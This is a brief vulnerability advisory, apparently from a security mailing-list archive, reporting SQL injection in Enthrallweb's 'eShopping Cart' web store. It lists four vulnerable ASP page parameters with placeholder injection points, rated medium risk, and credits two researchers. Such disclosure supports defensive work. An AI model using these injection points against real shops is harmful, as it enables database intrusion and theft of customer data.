<<< Date Index >>>     <<< Thread Index >>>

eShopping Cart [injection sql]



vendor site:http://www.enthrallweb.com/
product:eShopping Cart
bug:injection sql
risk:medium



injection sql :
http://site.com/reviews.asp?ProductID='[sql]
http://site.com/subProducts.asp?cat_id='[sql]
http://site.com/productdetail.asp?ProductID='[sql]
http://site.com/subProducts.asp?cat_id=27&sub_id='[sql]



laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx